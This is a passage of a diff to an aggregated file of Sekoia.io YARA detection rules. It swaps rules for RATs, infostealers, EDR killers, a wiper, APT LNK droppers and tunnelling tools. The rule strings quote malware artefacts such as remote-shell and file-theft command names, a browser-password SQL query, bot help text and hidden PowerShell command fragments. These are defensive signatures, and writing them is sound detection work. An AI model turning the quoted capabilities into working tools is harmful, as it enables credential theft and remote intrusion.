+		$ = "can not find secret header" wide ascii
+		$ = "${i18n|COMMON.UNKNOWN_ERROR}" wide ascii
+		$ = "/api/client/update" wide ascii
+		$ = "application/octet-stream" wide ascii
+		$ = "${i18n|COMMON.OPERATION_NOT_SUPPORTED}" wide ascii
+		$ = "no IP address found" wide ascii
+		$ = "failed to read network io counters" wide ascii
+		$ = "failed to read cpu info" wide ascii
+		$ = "PING" wide ascii
+		$ = "OFFLINE" wide ascii
+		$ = "LOCK" wide ascii
+		$ = "LOGOFF" wide ascii
+		$ = "HIBERNATE" wide ascii
+		$ = "SUSPEND" wide ascii
+		$ = "RESTART" wide ascii
+		$ = "SHUTDOWN" wide ascii
+		$ = "SCREENSHOT" wide ascii
+		$ = "TERMINAL_INIT" wide ascii
+		$ = "TERMINAL_INPUT" wide ascii
+		$ = "TERMINAL_RESIZE" wide ascii
+		$ = "TERMINAL_PING" wide ascii
+		$ = "TERMINAL_KILL" wide ascii
+		$ = "FILES_LIST" wide ascii
+		$ = "FILES_FETCH" wide ascii
+		$ = "FILES_REMOVE" wide ascii
+		$ = "FILES_UPLOAD" wide ascii
+		$ = "FILE_UPLOAD_TEXT" wide ascii
+		$ = "PROCESSES_LIST" wide ascii
+		$ = "PROCESS_KILL" wide ascii
+		$ = "DESKTOP_INIT" wide ascii
+		$ = "DESKTOP_PING" wide ascii
+		$ = "DESKTOP_KILL" wide ascii
+		$ = "DESKTOP_SHOT" wide ascii
+		$ = "COMMAND_EXEC" wide ascii
+		$ = "DEVICE_UPDATE" wide ascii
+		$ = "${i18n|COMMON.INVALID_PARAMETER}" wide ascii
+		$ = "${i18n|EXPLORER.FILE_OR_DIR_NOT_EXIST}" wide ascii
+		$ = "SPARK COMMIT: " wide ascii
+		$ = "${i18n|COMMON.DISCONNECTED}" wide ascii
+		$ = "${i18n|DESKTOP.NO_DISPLAY_FOUND}" wide ascii
+		$ = "/api/bridge/push" wide ascii
+		$ = "${i18n|COMMON.OPERATION_NOT_SUPPORTED}" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		17 of them and filesize > 4MB
 }
-rule SEKOIA_Tool_Edrsandblast_Api_Strings : FILE
+rule SEKOIA_Apt_Evasive_Panda_Rphost_Dll : FILE
 {
 	meta:
-		description = "Detects EDRSandblast API strings"
+		description = "Detects DLL used by Evasive Panda"
 		author = "Sekoia.io"
-		id = "8a5dc171-dce8-4b5a-96e9-53dd1855e8c1"
-		date = "2024-01-08"
+		id = "8d70639d-b736-4823-86ad-37f0e383b5f7"
+		date = "2024-03-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_edrsandblast_api_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_evasive_panda_rphost_dll.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "cd6afe68cf04e4949add323e0b5af5ea577b3dca07743e312e8236bf5c937672"
+		hash = "fa44028115912c95b5efb43218f3c7237d5c349f"
+		logic_hash = "2132f1c69db8fd5793c858ada2443fdfa1f941e68d24cc337766df99f8b3a895"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254714,85 +254750,95 @@ rule SEKOIA_Tool_Edrsandblast_Api_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[!] Required driver file not present at" wide
-		$ = "[!] New uninstall / install attempt failed" wide
-		$ = "[!] Kernel offsets are missing from the CSV" wide
-		$ = "[+] Downloading wdigest offsets from the MS Symbol Server" wide
-		$ = "[+] Check if EDR callbacks are registered on process" wide
+		$s1 = "htks.ini" ascii fullword
+		$s2 = "MyDemo" wide fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 1MB
 }
-rule SEKOIA_Botnet_Lin_Tsunami : FILE
+
+rule SEKOIA_Hacktool_Win_Gmer : FILE
 {
 	meta:
-		description = "Catch tsunami botnet based on string"
+		description = "Dtect the GMER hacktool based string and UPX usage"
 		author = "Sekoia.io"
-		id = "65d2ff89-064f-489a-a215-33197926a62d"
-		date = "2024-09-24"
+		id = "d2f1aba1-4222-45e5-95bd-4d7f08595cea"
+		date = "2022-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/botnet_lin_tsunami.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_win_gmer.yar#L3-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "536a28db011459d841652e25a852ccf2"
-		logic_hash = "8678ead4c863b2bc6bbb5e0023dee10f4e9f031bd0c8f515ad30d6145755ccaa"
+		logic_hash = "dbd4e97c343dcb14c6e814afa820a9fbb5aa4290c7ddf9d864029bb35bb96dbf"
 		score = 75
-		quality = 53
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$n = "NOTICE %s" ascii
-		$t = "TSUNAMI" ascii nocase
-		$s1 = "NICK" ascii fullword
-		$s2 = "GETSPOOFS" ascii fullword
-		$s3 = "IRC" ascii fullword
-		$s4 = "PONG" ascii
+		$pac = "IDI_GMER" wide
+		$str0 = "---- Processes - GMER %s ----" ascii
+		$str1 = "E:\\projects\\cpp\\gmer\\Release\\gmer.pdb" ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and #n > 40 and #t > 3 and 3 of ( $s* )
+		uint16( 0 ) == 0x5A4D and ( ( $pac and for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == "UPX0" ) ) or any of ( $str* ) ) and filesize < 900KB
 }
-rule SEKOIA_Rat_Win_Reverserat
+rule SEKOIA_Apt_Shadowpad_First_Called_Function : FILE
 {
 	meta:
-		description = "Detect SideCopy's ReverseRAT v3 observed in January 2023"
+		description = "Detects entrypoint of shadowpad"
 		author = "Sekoia.io"
-		id = "8fbd395f-f44e-46d5-a942-7c7e88f37127"
-		date = "2023-02-22"
+		id = "3ce1ffd3-5c30-4b36-b7cc-c9fa873ebc25"
+		date = "2023-01-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_reverserat.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_shadowpad_first_called_function.yar#L1-L36"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "b277a824b2671f40298ce03586a2ccc0fca2a081a66230c57a3060c2028f13ee"
-		hash = "8b87459483248d7b95424cd52b7d4f3031e89c6644adc2e167556e071d9ec3aa"
-		logic_hash = "13a5a916e084996ce4d7840581250f7630652acdcad0f66e21763cb3a9cbccc3"
+		logic_hash = "a40db3fad01f4177973fd50bd489e5c4ff6d3592dfff063c2c31694007c31e0b"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "SELECT maxclockspeed,  datawidth, name, manufacturer FROM Win32_Processor" wide
-		$ = "select * from Win32_PhysicalMemory" wide
-		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide
+		$chunk_1 = {
+        48 83 EC 28
+        33 C9
+        FF 15 ?? ?? ?? ??
+        8B 80 ?? ?? ?? ??
+        3B 05 ?? ?? ?? ??
+        74 ??
+        E8 ?? ?? ?? ??
+        E8 ?? ?? ?? ??
+        EB ??
+        48 8B 0D ?? ?? ?? ??
+        E8 ?? ?? ?? ??
+        8B C8
+        FF 15 ?? ?? ?? ??
+        90
+        B9 28 04 00 00
+        FF 15 ?? ?? ?? ??
+        90
+        48 83 C4 28
+        C3
+        }
 
 	condition:
-		all of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Rat_Win_Millenium : FILE
+rule SEKOIA_Rat_Win_Dcrat_Qwqdanchun : FILE
 {
 	meta:
-		description = "Finds MilleniumRAT samples based on the specific strings"
+		description = "Find DcRAT samples (qwqdanchun) based on specific strings"
 		author = "Sekoia.io"
-		id = "91320924-5c74-457a-8601-29c4e4034761"
-		date = "2023-11-16"
+		id = "8206a410-48b3-425f-9dcb-7a528673a37a"
+		date = "2023-01-26"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_millenium.yar#L1-L30"
+		reference = "https://github.com/qwqdanchun/DcRat"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_dcrat_qwqdanchun.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "bcf4158b9bfee65cd9bd74163ac108ea1de8ec0e9ad066e77bec788ae6fb7283"
+		logic_hash = "e6f8664e57ecce3bd7b2af5c67d564d526b32d12218b772b0e9f53709044e14d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254800,37 +254846,36 @@ rule SEKOIA_Rat_Win_Millenium : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Millenium RAT, version:" wide
-		$str02 = "Coded by @shinyenigma" wide
-		$str03 = "*gift*<NEW TOKEN>*<NEW CHAT ID>*<message> - gift this bot to another user, his telegram bot has to be started" wide
-		$str04 = "*historyForce - grab more browser history by killing browser processes, use carefully" wide
-		$str05 = "*download - victim`s PC downloads a file attached to this message, if it is a picture it should also be attached as a file" wide
-		$str06 = "No keylogs recorded!" wide
-		$str07 = "Successfully added RAT to startup" wide
-		$str08 = "You`ve gifted gifted a bot:" wide
-		$str09 = "Incorrect agrument, please enter 0/90/180/270" wide
-		$str10 = "SELECT action_url, username_value, password_value FROM logins" wide
-		$str11 = "Yandex\\YandexBrowser\\User Data\\Default" wide
-		$str12 = "Millenium-rat-CSharp (main project)" ascii
-		$str13 = "get_BatteryLifePercent" ascii
-		$str14 = "get_ExpirationMonth" ascii
-		$str15 = "sqlite3_extension_init " ascii
+		$str01 = "DcRatByqwqdanchun" wide
+		$str02 = "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==" wide
+		$str03 = "Po_ng" wide
+		$str04 = "Pac_ket" wide
+		$str05 = "Perfor_mance" wide
+		$str06 = "Install_ed" wide
+		$str07 = "get_IsConnected" ascii
+		$str08 = "get_ActivatePo_ng" ascii
+		$str09 = "isVM_by_wim_temper" ascii
+		$str10 = "save_Plugin" wide
+		$str11 = "timeout 3 > NUL" wide
+		$str12 = "ProcessHacker.exe" wide
+		$str13 = "Select * from Win32_CacheMemory" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of ( $str* )
+		uint16( 0 ) == 0x5A4D and 8 of them
 }
-rule SEKOIA_Tool_Bore_Rust_Any_Platform : FILE
+rule SEKOIA_Apt_Unk_Dex_China_Freedom_Trap_Spyware : FILE
 {
 	meta:
-		description = "Detects bore tunneling tool"
+		description = "Detects China Freedom Trap spyware dex file"
 		author = "Sekoia.io"
-		id = "c0ec0d72-de8e-4b96-9db6-a7a4e2f693f1"
-		date = "2023-07-28"
+		id = "3d66b6b8-8397-441a-a337-4a282df39591"
+		date = "2022-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_bore_rust_any_platform.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unk_dex_china_freedom_trap_spyware.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c51d75088897aaffef904d560f750d780a0c814b89bf433a05189fbf7bb3285c"
+		hash = "ceb70fce74898ea64ded6880a978441c"
+		logic_hash = "f85f78a1a58fa8b2698637f8c540877ea1c5141ff7f74e8c2f2755f5aba5a599"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254838,31 +254883,36 @@ rule SEKOIA_Tool_Bore_Rust_Any_Platform : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "bore_cli::" ascii
-		$ = "server handshake failed" ascii
-		$ = "server listening" ascii
-		$ = "connected to server" ascii
-		$ = "server requires authentication, but no client secret was provided" ascii
-		$ = "client port number too low" ascii
-		$ = "forwarding connection" ascii
-		$ = "Address of the remote server to expose local ports" ascii
+		$ = "INSTALL" base64
+		$ = "FAILED" base64
+		$ = "TEST" base64
+		$ = "ONLY" base64
+		$ = "INSTALL" base64
+		$ = "INCONSISTENT" base64
+		$ = "CERTIFICATES" base64
+		$ = "Network country iso:" base64
+		$ = "Network operator name:" base64
+		$ = "SIM operator name:" base64
+		$ = "SIM country iso:" base64
+		$ = "SIM state:" base64
+		$ = "PIN REQUIRED" base64
+		$ = "PUK REQUIRED" base64
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe or uint16be( 0 ) == 0x4d5a ) and filesize < 15MB and 5 of them
+		uint32be( 0 ) == 0x6465780A and filesize < 100KB and 4 of them
 }
-rule SEKOIA_Tool_Inswor_Strings : FILE
+rule SEKOIA_Apt_Gamaredon_Lnk : FILE
 {
 	meta:
-		description = "Detects In-Swor based on strings"
+		description = "Detects lnk file used by Gamaredon"
 		author = "Sekoia.io"
-		id = "99aaad33-510a-41b9-9022-800588c18d6d"
-		date = "2024-09-09"
+		id = "bfa69d84-433c-4f37-93b7-5b1b11677fbb"
+		date = "2024-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_inswor_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_lnk.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "c393128a143b2a3397100b4a30c75112"
-		logic_hash = "b25072e6a9fa5728c24c91056a221778f5fbc9d8ba7a78a6684cd6755761373e"
+		logic_hash = "be73ffca4b88f11e33532cf9a179743508bfa7a60c6f4de98c245b350b5fb910"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254870,25 +254920,24 @@ rule SEKOIA_Tool_Inswor_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "open encrypted file error:" ascii
-		$ = "open config file error:" ascii
-		$ = "payload.ini" ascii
+		$s1 = "-windowstyle hidden $(gc " wide
+		$s2 = "|out-string)|powershell -noprofile -" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint32be( 0 ) == 0x4c000000 and any of them and filesize < 100KB
 }
-rule SEKOIA_Apt_Badmagic_Commonmagic_Screenshot_Module : FILE
+rule SEKOIA_Tool_Rsockstun_Strings : FILE
 {
 	meta:
-		description = "Detects CommonMagic related implants"
+		description = "Detects Rsockstun based on strings"
 		author = "Sekoia.io"
-		id = "d1ef0bd1-37dc-405f-b82b-288b1798455c"
-		date = "2023-05-15"
+		id = "94d8cb39-3421-441c-8404-62a591b86912"
+		date = "2023-12-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_commonmagic_screenshot_module.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_rsockstun_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "caab57534a00620974f7d49c7b38a3f191aca596b69b3e4c499e3099023c2f9c"
+		logic_hash = "8faf1004ec56728f1e451734ed651e8f77a49faf7f232df82e0b4950a9f1d198"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254896,105 +254945,137 @@ rule SEKOIA_Apt_Badmagic_Commonmagic_Screenshot_Module : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%s_%02d.%02d.%04d_%02d.%02d.%02d.%03d.%s" wide
-		$ = "Screenshot" wide
-		$ = "\\\\.\\pipe\\PipeDtMd" wide
+		$ = "main.connectviaproxy"
+		$ = "main.connectForSocks"
+		$ = "main.listenForClients"
+		$ = "main.listenForSocks"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 10MB and all of them
 }
-rule SEKOIA_Truesightkiller_Avkiller_Strings : FILE
+rule SEKOIA_Tool_Yasso_Strings : FILE
 {
 	meta:
-		description = "TrueSightKiller based on string"
+		description = "Detects Yasso based on strings"
 		author = "Sekoia.io"
-		id = "8f249ac4-5181-4169-9eb2-7d73ec4fd68d"
-		date = "2024-10-29"
+		id = "31ec7510-6770-4fde-b835-e8b12f8f2b30"
+		date = "2023-06-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/truesightkiller_avkiller_strings.yar#L1-L45"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_yasso_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "891202963430a4b1dea2dc5b9af01dc5"
-		hash = "367af202029bf51fc347a8f414fa2a5c"
-		hash = "64439836d69084b129c2dc4264176149"
-		hash = "6e69b890b1c228fa4225776b185b5af7"
-		hash = "daaf7bdf1e7fd882c0bfb89450ec0ab2"
-		hash = "dcf36765ed9386c169eb2695d26f6a6f"
-		logic_hash = "829d144023569f332a27b7f2344d2da7be59ae5044a13c299c5da50d896288ed"
+		logic_hash = "1d715b0962ba9ecbe11649ea85870a8f884f6dd7eda27b1f8eff0d7f5de8c765"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[+] Process PID: " wide
-		$ = "[-] OpenSCManager failed" wide
-		$ = "[+] Creating service: truesight" wide
-		$ = "[+] Full path: " wide
-		$ = "[-] Error getting current directory." wide
-		$ = "[-] CreateService failed" wide
-		$ = "[!] Service is already running" wide
-		$ = "[-] QueryServiceStatus failed" wide
-		$ = "[-] StartService failed" wide
-		$ = "[+] Driver loaded successfully!" wide
-		$ = "[-] OpenService failed" wide
-		$ = "[-] ControlService failed" wide
-		$ = "[-] DeleteService failed" wide
-		$ = "Welcome to EDR/AV Killer using truesight driver!" wide
-		$ = "This is a PoC, use it at your own risk!" wide
-		$ = "[-] Failed to set CTRL+C handler. Exiting..." wide
-		$ = "ntdll.dll" wide
-		$ = "\\\\.\\TrueSight" wide
-		$ = "[-] CreateFileA failed" wide
-		$ = " not running" wide
-		$ = "[-] Process name: " wide
-		$ = "[+] Terminating PID: " wide
-		$ = "[-] DevicesIoControl failed" wide
-		$ = "[!] Stoping and Deleting trueSight Service!" wide
+		$ = "Yasso/cmd.setting"
+		$ = "Yasso/cmd.Client"
+		$ = "Yasso/cmd.IdentifyResult"
+		$ = "Yasso/cmd.RespLab"
+		$ = "Go build ID"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and filesize > 20KB and 20 of them
+		uint16be( 0 ) == 0x4d5a and filesize > 15MB and filesize < 20MB and all of them
 }
-rule SEKOIA_Exploit_Linux_Eop_Cve202121974_Exploit_Strings : CVE_2021_21974 FILE
+rule SEKOIA_Apt_Sandworm_Caddywiper_Stacked_Strings : FILE
 {
 	meta:
-		description = "Detects CVE-2021-21974 Local Privesc exploit"
+		description = "Detects stacked strings used in the wiper."
 		author = "Sekoia.io"
-		id = "8e1fbbe5-7d51-48b4-80d5-90abff8cab9e"
-		date = "2023-12-08"
+		id = "7750c4b6-5781-4b1c-8200-cbce9f18aa56"
+		date = "2022-04-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_cve202121974_exploit_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sandworm_caddywiper_stacked_strings.yar#L1-L74"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a2e6e2660fcbf6ffa80809c02ca78fae85d27f6cd8d2c83bb2645a86124ca7f2"
+		logic_hash = "e8c94e8611a50080368785d2b341a95d5359d1d814e1d665553324118700ed10"
 		score = 75
 		quality = 80
-		tags = "CVE-2021-21974, FILE"
-		version = "1.0"
+		tags = "FILE"
+		version = "2.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".name.replace('Thread','SLP Client'"
-		$ = "print('[' + name + '] recv: ', d)"
-		$ = "requests[28].put(connect())"
-		$ = "[+] stack enviorn address:"
+		$ = { C6 45 ?? 6E
+        C6 45 ?? 65
+        C6 45 ?? 74
+        C6 45 ?? 61
+        C6 45 ?? 70
+        C6 45 ?? 69
+        C6 45 ?? 33
+        C6 45 ?? 32
+        C6 45 ?? 2E
+        C6 45 ?? 64
+        C6 45 ?? 6C
+        C6 45 ?? 6C }
+		$ = {  C6 45 ?? 44
+        C6 45 ?? 65
+        C6 45 ?? 76
+        C6 45 ?? 69
+        C6 45 ?? 63
+        C6 45 ?? 65
+        C6 45 ?? 49
+        C6 45 ?? 6F
+        C6 45 ?? 43
+        C6 45 ?? 6F
+        C6 45 ?? 6E
+        C6 45 ?? 74
+        C6 45 ?? 72
+        C6 45 ?? 6F
+        C6 45 ?? 6C }
+		$ = { C6 45 ?? 5C
+        C6 45 ?? 00
+        C6 45 ?? 5C
+        C6 45 ?? 00
+        C6 45 ?? 2E
+        C6 45 ?? 00
+        C6 45 ?? 5C
+        C6 45 ?? 00
+        C6 45 ?? 50
+        C6 45 ?? 00
+        C6 45 ?? 48
+        C6 45 ?? 00
+        C6 45 ?? 59
+        C6 45 ?? 00
+        C6 45 ?? 53
+        C6 45 ?? 00
+        C6 45 ?? 49
+        C6 45 ?? 00
+        C6 45 ?? 43
+        C6 45 ?? 00
+        C6 45 ?? 41
+        C6 45 ?? 00
+        C6 45 ?? 4C
+        C6 45 ?? 00
+        C6 45 ?? 44
+        C6 45 ?? 00
+        C6 45 ?? 52
+        C6 45 ?? 00
+        C6 45 ?? 49
+        C6 45 ?? 00
+        C6 45 ?? 56
+        C6 45 ?? 00
+        C6 45 ?? 45 }
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and 2 of them
 }
-rule SEKOIA_Infostealer_Win_Ducklogs : FILE
+rule SEKOIA_Apt_Flightnight_Malicious_Lnk : FILE
 {
 	meta:
-		description = "Detects DuckLogs based on specific strings"
+		description = "Detects malicious LNK used by FlightNight"
 		author = "Sekoia.io"
-		id = "165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5"
-		date = "2022-12-01"
+		id = "06f33ece-ac9f-4dd3-98fb-cd69305ee995"
+		date = "2024-04-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_ducklogs.yar#L1-L30"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_flightnight_malicious_lnk.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5db1a5595ec41488da620606bbcb36d0d686f9d6b7a0479439c53625df0886a0"
+		logic_hash = "3446852709fe425b2c053ffdb9c078cf20e442ef50fe20402d3b4c9e9d8b543a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255002,38 +255083,26 @@ rule SEKOIA_Infostealer_Win_Ducklogs : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$dck = "DuckLogs" ascii wide
-		$str01 = "CheckRemoteDebuggerPresent" ascii
-		$str02 = "MozGlueNotFound" ascii
-		$str03 = "get_DecryptedPassword" ascii
-		$str04 = "get_Extension" ascii
-		$str05 = "set_UseShellExecute" ascii
-		$str06 = "FirefoxPasswords" ascii
-		$str07 = "GetAllGeckoCookies" ascii
-		$str08 = "GetAllBlinkDownloadsBy" ascii
-		$str09 = "Grabbers" ascii
-		$str10 = "Utility" ascii
-		$str11 = "Persistance" ascii
-		$str12 = "Clipboard" ascii
-		$str13 = "WaterfoxGrabber" ascii
-		$str14 = "AvastGrabber" ascii
+		$s0 = "/c start /B " wide
+		$s1 = ".exe &" wide
+		$s2 = ".pdf" wide
+		$s3 = "%CD%" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( #dck > 4 and 2 of ( $str* ) ) or 12 of them )
+		uint32be( 0 ) == 0x4c000000 and $s1 in ( @s0 .. @s2 ) and $s1 in ( @s0 .. @s0 + 100 ) and $s3
 }
-
-rule SEKOIA_Plugx_Final_Payload : FILE
+rule SEKOIA_Apt_3Cx_Payload_Stealer : FILE
 {
 	meta:
-		description = "Detects encrypted plugx config with a specific size"
+		description = "Detects stealer used in 3CX campaign"
 		author = "Sekoia.io"
-		id = "a4047324-81a7-4c17-be84-c0fa479d2f89"
-		date = "2023-07-04"
+		id = "1ca0605d-101f-4d1d-a476-9dfd93e74b4c"
+		date = "2023-03-31"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/plugx_final_payload.yar#L3-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_3cx_payload_stealer.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "bf5035eb7ed620edcf7a0e8e8be220451ce268fc49310f28059b60576d8c5182"
+		logic_hash = "17630ab86a3da3408e29765c0c30f14c76b870b88fea634b998392fe5d46cfa2"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -255041,78 +255110,101 @@ rule SEKOIA_Plugx_Final_Payload : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 88 13 00 00 60 ea 00 00 ?? ?? ?? ?? 00 00 00 00}
+		$s1 = "******************************** %s ******************************" wide
+		$s2 = "\\3CXDesktopApp\\config.json" wide
+		$s3 = "{\"HostName\": \"%s\", \"DomainName\": \"%s\", \"OsVersion\":" wide
+		$s4 = "%s.old" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == ".data" and $s1 in ( pe.sections [ i ] . raw_data_offset..pe.sections [ i ] . raw_data_offset + pe.sections [ i ] . raw_data_size ) )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
 }
-rule SEKOIA_Apt_Susp_Apt28_Uac0063_Malicious_Doc_Vba : FILE
+rule SEKOIA_Apt_Badmagic_Reco_Pshscript : FILE
 {
 	meta:
-		description = "Detects some suspected APT28 document vba"
+		description = "Detects BadMagic Reco powershell script"
 		author = "Sekoia.io"
-		id = "58040dbd-09ae-4f9e-940d-3a522e7ccfbb"
-		date = "2024-07-25"
+		id = "7a1b2d31-03b7-4a43-8f4e-ed38ba8e118e"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_susp_apt28_uac0063_malicious_doc_vba.yar#L1-L17"
